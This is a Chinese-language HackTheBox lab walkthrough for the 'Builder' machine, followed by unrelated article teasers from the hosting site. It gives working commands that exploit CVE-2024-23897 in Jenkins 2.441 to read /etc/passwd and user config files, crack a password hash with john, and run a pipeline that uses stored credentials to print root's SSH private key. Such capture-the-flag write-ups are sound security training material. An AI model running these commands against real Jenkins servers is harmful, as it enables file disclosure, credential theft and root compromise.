HackTheBox-Machines--Builder

文章目录

  • 1 端口扫描
  • 2 测试思路
  • 3 漏洞测试


Builder测试过程


1 端口扫描


nmap -sC -sV 10.129.230.220

在这里插入图片描述


2 测试思路


系统开启了22和8080端口,22端口无账号密码,测试方向主要从8080的jenkins服务开始测试。
在测试开源系统时,可以下载源代码或本地搭建服务,以便更清楚的了解服务的相关信息。


3 漏洞测试


  1.访问8080端口,应用程序为2.441版本 jenkins
在这里插入图片描述

  2.通过搜索引擎查找相关exploit
在这里插入图片描述

  3.CVE-2024-23897漏洞利用

CVE-2024-23897漏洞详情:https://www.cvedetails.com/cve/CVE-2024-23897/
jenkins-cli.jar工具地址:https://github.com/CKevens/CVE-2024-23897

# 读取/etc/passwd文件
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://10.129.230.220:8080' help "@/etc/passwd"

在这里插入图片描述

#查看users.txt文件
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://10.129.230.220:8080' connect-node "@/var/jenkins_home/users/users.xml"    

在users.txt文件中,发现用户名及附加的随机字符串 jennifer_12108429903186576833

在这里插入图片描述

在jennifer_12108429903186576833用户目录下,存在config.xml文件,保存了用户的密码哈希:

java -jar jenkins-cli.jar -noCertificateCheck -s 'http://10.129.230.220:8080' connect-node "@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml"

在这里插入图片描述

使用john工具破解hash密码:

vim  $2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a > hash
john hash -w=rockyou.txt

在这里插入图片描述

  4.权限获取

利用账号密码 jennifer:princess登录jenkins

在这里插入图片描述

  5.权限提升

jenkins 上存储了root用户及密码,但是ssh密钥无法访问,通过创建管道并使用ssh运行命令获取密钥文件:
在这里插入图片描述

使用如下脚本利用Pipeline获取ssh密钥

pipeline {
agent any
stages {
stage('SSH') {
steps {
script {
sshagent(credentials: ['1']) { sh 'ssh -o StrictHostKeyChecking=no root@10.129.230.220 "cat /root/.ssh/id_rsa"'
}
}
}
}
}
}

在这里插入图片描述

在这里插入图片描述

利用ssh密钥登录

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/787072.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

基于springboot的一站式家装服务管理系统

文章目录 项目介绍主要功能截图:部分代码展示设计总结项目获取方式🍅 作者主页:超级无敌暴龙战士塔塔开 🍅 简介:Java领域优质创作者🏆、 简历模板、学习资料、面试题库【关注我,都给你】 🍅文末获取源码联系🍅 项目介绍 基于springboot的一站式家装服务管理系统…

766. 托普利茨矩阵

给你一个 m x n 的矩阵 matrix 。如果这个矩阵是托普利茨矩阵,返回 true ;否则,返回 false 。 如果矩阵上每一条由左上到右下的对角线上的元素都相同,那么这个矩阵是 托普利茨矩阵 。 示例 1: 输入:matr…

3、jvm基础知识(三)

如何判断堆上的对象没有被引用? 常见的有两种判断方法:引用计数法和可达性分析法。 引用计数法会为每个对象维护一个引用计数器,当对象被引用时加1,取消引用时减1。 引用计数法的优点是实现简单,缺点有两点&#xff1…

电机选型与直线模组(简化版)

2-1电机分类和普通电机选型 1、电机及其原理的基本认知: 电动机我们平时简称电机,大部分情况下指的都是通电后,输出轴会旋转运动的设备。即将电能转换为机械能,供我们使用以驱动机构运行。电机简单的讲,其实就是一个…

ubuntu 一键安装python3.10和pip3.10

在Ubuntu系统上,您可以通过添加官方Python PPA来安装Python 3.10。以下是通过命令行安装Python 3.10和pip的步骤: 打开终端。 添加deadsnakes PPA(Personal Package Archive): sudo add-apt-repository ppa:deadsna…

梨花带雨网页音乐播放器二开优化修复美化版全开源版本源码

源码简介 最新梨花带雨网页音乐播放器二开优化修复美化版全开源版本源码下载 梨花带雨播放器基于thinkphp6开发的XPlayerHTML5网页播放器前台控制面板,支持多音乐平台音乐解析。二开内容:修复播放器接口问题,把接口本地化,但是集成外链播放器…

【前端推荐】node.js有哪些命令

Node.js是一个基于Chrome V8引擎的JavaScript运行环境,它允许开发者在服务器端运行JavaScript代码。Node.js拥有丰富的模块和工具,通过命令行工具,可以执行各种任务来简化开发流程。以下是一些常用的Node.js命令: 1. node 这是最…

x264 arm64汇编分析 quant8x8_neon分析

一 C语言实现 #define QUANT_ONE( coef, mf, f ) \ { \ if( (coef) > 0 ) \ (coef) (f (coef)) * (mf) >> 16; \ else \ (coef) - ((f - (coef)) * (mf) >> 16); \ nz | (coef); \ } static int quant_8x8( dctcoef dct[64], udctcoef mf[64], udctcoef bias…

【Qt】常用控件(输入类)

目录 一、Line Edit二、Text Edit三、ComBo四、DateTimeEdit五、Slider 一、Line Edit QLineEdit 用来表示单行输入框,可以输入一段文本,但是不能换行。 属性说明test输入框中的文本inputMask输入内容格式约束maxLength最大长度frame是否添加边框echoM…

harbor api v2.0

harbor api v2.0 v2.0 v2.0 “harbor api v2.0”与v1区别较大,此处harbor也做了https。另外,通过接口拿到的数据也是只能默认1页10个,所以脚本根据实际情况一页页的循环抓取数据 脚本主要用于统计repo(仓库)、image,以及所有镜像…

东方财富网股票数据爬虫

废话不多说 , 直接上源码 import csv # 用于读写 CSV 文件 import json # 用于解析 JSON 数据 import requests # 用于发送 HTTP 请求 from lxml import etree # 用于解析 HTML 文档# 定义 DataScraper 类,实现数据抓取功能 class DataScraper:# 初始化函数def…

腾讯云2023: 容器与函数计算实践精选,引领Serverless与Docker容器新趋势

引言 在云计算领域,容器和函数计算技术的迅猛发展正引领着企业架构的新变革。尤其是在2023年,随着技术的成熟和应用场景的拓展,腾讯云发布的《2023腾讯云容器和函数计算技术实践精选集》为我们提供了一窗口,深入了解这一领域的最…

C#多线程编程详细教学

在C#中,多线程编程是一种非常重要的技术,它允许程序同时执行多个任务,从而提高了应用程序的响应性和整体性能。本文将详细介绍C#中的多线程编程,包括基本概念、线程创建、线程同步以及相关的代码示例。 一、基本概念 线程是操作…

【新手适用】手把手教你从零开始实现一个基于Pytorch的卷积神经网络CNN二: 如何训练模型,内附详细损失、准确率、均值计算

手把手教你从零开始实现一个基于Pytorch的卷积神经网络CNN(新手适用)一: model.py:创建模块-CSDN博客 从零开始实现一个基于Pytorch的卷积神经网络 - 知乎 目录 1 设备device定义 2 训练模型定义 3 开始训练 3.1 step、batch…

4.机器学习-十大算法之一线性回归算法(LinearRegression)案例讲解

机器学习-十大算法之一线性回归算法案例讲解 一摘要二个人简介三什么是线性回归四LinearRegression使用方法五糖尿病数据线性回归预测1.数据说明2.导包3.导入数据4.脱敏处理5.抽取训练数据和预测数据6.创建模型7.预测8.线性回归评估指标9.研究每个特征和标记结果之间的关系.来分…

职场成功的关键:提升软实力,成就非凡事业

在竞争激烈的职场中,专业技能固然重要,但软实力同样不可或缺。要想在职场中脱颖而出,实现事业上的成功,我们需要在提升软实力上下功夫。本文将探讨职场软实力的内涵及其在职场成功中的作用,并提供一些建议,…

解决Quartus与modelsim联合仿真问题:# Error loading design解决,是tb文件中没加:`timescale 1ns/1ns

解决Quartus与modelsim联合仿真问题:# Error loading design解决,是tb文件中没加:timescale 1,一直走下来,在modelsim中出现了下面问题2,rtl文件、tb文件2.1,rtl代码2.2,tb测试2.3&a…

java Web实现用户登录功能

文章目录 一、纯JSP方式实现用户登录功能(一)实现思路1、创建Web项目2、创建登录页面3、创建登录处理页面4、创建登录成功页面5、创建登录失败页面6、编辑项目首页 (三)测试结果 二、JSPServlet方式实现用户登录功能(一…

校园通勤车可视化系统的设计与实现

1.需求分析: 校园通勤车可视化系统的设计与实现,不用管什么可视化,就是一个小程序就是可以知道校园车的路线,然后往简单了弄就可以。 校园通勤车可视化系统的设计与实现,不用管什么可视化,就是一个小程序…

【C/C++】C++学籍信息管理系统(源码+报告)【独一无二】

👉博__主👈:米码收割机 👉技__能👈:C/Python语言 👉公众号👈:测试开发自动化【获取源码商业合作】 👉荣__誉👈:阿里云博客专家博主、5…